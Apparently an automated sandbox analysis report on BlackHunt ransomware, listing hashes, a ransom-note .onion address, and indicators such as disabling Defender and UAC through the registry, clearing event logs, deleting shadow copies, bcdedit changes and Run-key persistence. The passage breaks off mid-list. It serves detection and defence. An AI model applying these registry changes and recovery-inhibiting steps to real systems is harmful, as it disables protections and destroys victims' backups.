Analysis
-
max time kernel
138s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:30
Static task
static1
Behavioral task
behavioral1
Sample
5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe
Resource
win10v2004-20231222-en
General
-
Target
5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe
-
Size
707KB
-
MD5
f8efa496ee2a81a4d914060170624725
-
SHA1
32d035afc9842e39914c56ef5b37806c03197c68
-
SHA256
5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e
-
SHA512
e2aa03c33e200bdddccd233d12d146e985b007f65f199f62fa38f204575c5af0ee989add22bc7709f1026f1d5e636007542aeea377bae78042cc9ea1fd98c9c4
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1v8Kvnh:6uaTmkZJ+naie5OTamgEoKxLWOEh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 9144 fsutil.exe 16584 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 19972 wevtutil.exe 19180 wevtutil.exe 19236 wevtutil.exe 19860 wevtutil.exe 19856 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9772 bcdedit.exe 9152 bcdedit.exe 19996 bcdedit.exe 20472 bcdedit.exe -
Renames multiple (3363) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5256 wbadmin.exe 16600 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\K: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\N: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\O: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\M: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\R: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\U: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\J: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\L: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\Q: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\A: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\V: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\B: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\T: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\P: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\X: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\W: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\I: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\S: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\H: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\E: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\G: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened (read-only) \??\Z: 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation.png 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\ui-strings.js 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\id_get.svg 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\sv-se\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\logo_retina.png 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\thaidict.md 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\ui-strings.js 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\plugin.js 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\over-arrow-navigation.svg 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Microsoft.VCLibs.x86.14.00.appx 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\de-de\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\he-il\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\ui-strings.js 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\css\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\Java\jre-1.8\lib\jfr\#BlackHunt_Private.key 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon.png 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-gb\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\AppStore_icon.svg 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\#BlackHunt_ReadMe.txt 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_ReadMe.hta 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9604 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 19528 vssadmin.exe 8100 vssadmin.exe 9592 vssadmin.exe 9268 vssadmin.exe 10748 vssadmin.exe 9132 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 16804 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 16636 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Token: SeRestorePrivilege 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Token: SeBackupPrivilege 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Token: SeTakeOwnershipPrivilege 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Token: SeAuditPrivilege 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Token: SeSecurityPrivilege 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Token: SeIncBasePriorityPrivilege 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Token: SeBackupPrivilege 11900 wbengine.exe Token: SeRestorePrivilege 11900 wbengine.exe Token: SeSecurityPrivilege 11900 wbengine.exe Token: SeSecurityPrivilege 19180 wevtutil.exe Token: SeBackupPrivilege 19180 wevtutil.exe Token: SeSecurityPrivilege 19236 wevtutil.exe Token: SeBackupPrivilege 19236 wevtutil.exe Token: SeSecurityPrivilege 19856 wevtutil.exe Token: SeBackupPrivilege 19856 wevtutil.exe Token: SeSecurityPrivilege 19860 wevtutil.exe Token: SeBackupPrivilege 19860 wevtutil.exe Token: SeSecurityPrivilege 19972 wevtutil.exe Token: SeBackupPrivilege 19972 wevtutil.exe Token: SeDebugPrivilege 16804 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1572 wrote to memory of 832 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 98 PID 1572 wrote to memory of 832 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 98 PID 1572 wrote to memory of 540 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 96 PID 1572 wrote to memory of 540 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 96 PID 1572 wrote to memory of 4248 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 158 PID 1572 wrote to memory of 4248 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 158 PID 1572 wrote to memory of 2860 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 143 PID 1572 wrote to memory of 2860 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 143 PID 832 wrote to memory of 1100 832 cmd.exe 101 PID 832 wrote to memory of 1100 832 cmd.exe 101 PID 1572 wrote to memory of 2544 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 102 PID 1572 wrote to memory of 2544 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 102 PID 540 wrote to memory of 5004 540 cmd.exe 105 PID 540 wrote to memory of 5004 540 cmd.exe 105 PID 4248 wrote to memory of 1376 4248 cmd.exe 104 PID 4248 wrote to memory of 1376 4248 cmd.exe 104 PID 1572 wrote to memory of 4496 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 176 PID 1572 wrote to memory of 4496 1572 